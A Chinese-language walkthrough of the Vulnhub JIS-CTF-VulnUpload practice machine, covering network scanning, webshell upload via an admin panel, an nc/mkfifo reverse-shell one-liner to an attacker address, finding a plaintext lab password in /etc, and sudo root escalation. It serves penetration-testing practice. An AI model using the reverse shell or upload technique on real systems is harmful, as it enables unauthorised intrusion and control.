Vulnhub JIS-CTF-VulnUpload靶機滲透

配置問題解決

參考個人這篇文章https://www.cnblogs.com/A1oe/p/12571032.html更改網卡配置文件進行解決。

信息蒐集

找到靶機
nmap -sP 192.168.146.0/24
nmap -A 192.168.146.149

掃描到的目錄到訪問下，訪問/flag目錄拿到flag1
而後訪問http://192.168.146.149/admin_area/顯然

可是看源碼能拿到用戶密碼和flag2(卡了好久，一直測登錄那裏有沒有sql注入。。。)

getflag

flag1+flag2

上面已經拿到了，再也不說了

flag3

admin登錄進來，文件上傳，無waf。

可是無回顯路徑和文件名。

目前思路：增強目錄掃描強度，將文件上傳目錄掃描出來。
bp的target目錄掃描配合爬蟲，能掃出更多目錄（bp真香

掃到兩個文件上傳目錄

訪問一下http://192.168.146.149/uploaded_files/normal.php發現解析，直接蟻劍連上（nomal.php是我上傳的文件名）

flag.txt是空的（無權限），看看hint.txt找到flag3

flag4

hint.txt讓咱們找到technawi用戶的密碼來訪問flag.txt，那接下來就找文件。
在這以前，爲了方便找文件，先反彈shell

滲透機：nc -lvvp 4444
靶機：rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.146.132 4444 >/tmp/f

接下來找technawi用戶的密碼。
老規矩先進/home/technawi目錄下看看，有幾個文件分別看看，或者直接grep -r 'tectnawi'，並無什麼發現

根目錄grep -r耗時確定很是久，因此挑一些可能有密碼的目錄一個一個來（/var/log、/var/www/html、/proc、/etc）
最後在/etc目錄發現驚喜

看看credentials.txt的文件，發現flag4和用戶的密碼。

username : technawi
password : 3vilH@ksor

提權

拿到帳號密碼直接ssh連上去。
靶機只有五個flag，最後一個flag應該要提權才能拿到，因此接下來進行提權。
以前看到.sudo_as_admin_successful文件，應該是個提示。
因此sudo -l看看sudo權限。

ALL。。。
直接sudo su root

成功提權。

總結

難怪這個靶機叫CTF。。。腦洞和某些CTF比賽同樣大。。。 本身找目錄可把我整慘了(字典太lj)，最後仍是bp大法好。 提高爲root過程不說了，實在沒什麼好說的。。